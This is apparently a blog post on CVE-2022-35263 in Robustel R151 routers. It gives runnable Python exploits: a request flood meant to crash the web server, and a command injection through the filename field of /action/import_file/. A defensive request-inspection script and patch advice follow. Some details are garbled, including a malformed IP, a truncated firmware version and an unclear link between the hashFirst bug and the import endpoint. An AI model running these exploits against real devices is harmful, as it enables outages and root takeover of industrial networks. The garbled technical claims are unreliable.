CVE-2022-35263 affects the Robustel R151 cellular router, a commonly used device in Internet of Things (IoT) deployments and industrial networking. This vulnerability covers both a denial of service (DoS) in the device’s web server and a command injection issue in its authentication API.
Affected firmware versions:
3.3.
In this post, we’ll look at what causes these vulnerabilities, show sample code that demonstrates the exploit, and explain how attackers can use them.
> DISCLAIMER: All content here is for educational use only. Don’t use this information to attack devices you do not own or have permission to test.
### 1. Denial of Service via hashFirst Functionality
Component: Web server
Vulnerable Function: hashFirst
Impact: Attackers can make the web server crash, causing network downtime and loss of connectivity.
Technical Analysis
The Robustel R151 web server uses a custom hash table to process incoming HTTP requests. There’s a logic bug in the hashFirst implementation, which does not properly handle certain malformed requests. If an attacker sends a sequence of specially-crafted requests, it can cause a crash (DoS).
Example Exploit
If you send multiple malformed or oversized HTTP POST requests to the device’s web server, you can trigger the flaw.
Python Example
```python
import requests

device_ip = '192.168..1'  # replace with your router’s IP
url = f'http://{device_ip}/action/import_file/'

# This payload causes trouble with the router's hashFirst logic:
malformed = "A" * 10000

for i in range(10):
    try:
        requests.post(url, data=malformed)
        print(f"Sent packet #{i+1}")
    except Exception:
        print("Target web server appears to be down")
        break
```
After running this script several times, the web interface on the router will freeze or crash, making management impossible until a reboot.
### 2. Command Injection in /action/import_file/ API
Component: /action/import_file/ API
Impact: Remote attackers can run commands as root, leading to full compromise.
Technical Analysis
The import file API does not sanitize input data. If an attacker crafts a POST request that includes shell metacharacters or command sequences, the input is passed to shell handlers by the backend. This results in arbitrary command execution.
Example Exploit
Below is a proof-of-concept using Python to trigger command injection. Imagine the attacker wants to create a new file on the device.
Python Exploit
```python
import requests

device_ip = '192.168..1'  # replace with target router’s IP
url = f'http://{device_ip}/action/import_file/'

# Injects a new file creation command through the filename parameter
payload = {
    'filename': 'backup.cfg; touch /tmp/hacked.txt; #',
    'file': ('backup.cfg', b"dummy content")
}

# We need to send as multipart/form-data since an upload is expected
response = requests.post(url, files=payload)
print("Response status:", response.status_code)
```
If successful, /tmp/hacked.txt will be created on the device, demonstrating arbitrary command execution.
Mitigations
- Upgrade firmware: Robustel has released patches in newer firmware. Always update to the latest version.
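Until the firmware is updated, requests to the import API can be screened at a reverse proxy or in captured traffic. The following is an added example, not code from the original post or from Robustel: it inspects one captured request to /action/import_file/ and flags the two patterns described above, oversized bodies and shell metacharacters in the filename field. The function names, the 8192-byte threshold and the sample requests are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes

API_PATH = "/action/import_file/"   # endpoint named in this post
MAX_BODY = 8192                     # assumed size threshold; tune per deployment
SHELL_META = re.compile(r"[;&|`$()<>\\\n\r]")

def inspect_request(method, path, content_type, body):
    """Return a list of findings for one captured request to the import API."""
    findings = []
    if method.upper() != "POST" or not path.startswith(API_PATH):
        return findings
    if len(body) > MAX_BODY:
        findings.append("oversized-body")
    if not content_type.lower().startswith("multipart/form-data"):
        findings.append("not-multipart")
        return findings
    # Prepend the Content-Type header so the stdlib MIME parser can split parts.
    msg = message_from_bytes(
        b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body)
    if not msg.is_multipart():
        findings.append("malformed-multipart")
        return findings
    for part in msg.get_payload():
        values = [part.get_filename()]          # filename="..." attribute, if any
        name = part.get_param("name", header="content-disposition")
        if name == "filename":                  # the form field the PoC abuses
            raw = part.get_payload(decode=True) or b""
            values.append(raw.decode("latin-1").strip())
        for value in values:
            if isinstance(value, str) and SHELL_META.search(value):
                findings.append(f"shell-metachar:{value!r}")
    return findings

def sample_form(filename_field):
    """Build a constructed multipart body shaped like the upload form."""
    b = "XBOUND"
    body = (f'--{b}\r\nContent-Disposition: form-data; name="filename"\r\n\r\n'
            f'{filename_field}\r\n'
            f'--{b}\r\nContent-Disposition: form-data; name="file"; '
            f'filename="backup.cfg"\r\n\r\ndummy content\r\n--{b}--\r\n')
    return f"multipart/form-data; boundary={b}", body.encode()

if __name__ == "__main__":
    samples = {"benign": sample_form("backup.cfg"),
               "injection": sample_form("backup.cfg; touch /tmp/hacked.txt; #"),
               "flood": ("", b"A" * 10000)}
    for label, (ctype, body) in samples.items():
        print(label, inspect_request("POST", API_PATH, ctype, body))
```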
Conclusion
CVE-2022-35263 is a serious vulnerability in Robustel R151 routers. Anyone with access to the management port can cause a denial of service or take over the device due to poor input filtering. Devices deployed in critical networks should be patched ASAP and restricted from untrusted access.
Always secure your IoT devices and keep firmware up to date!
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC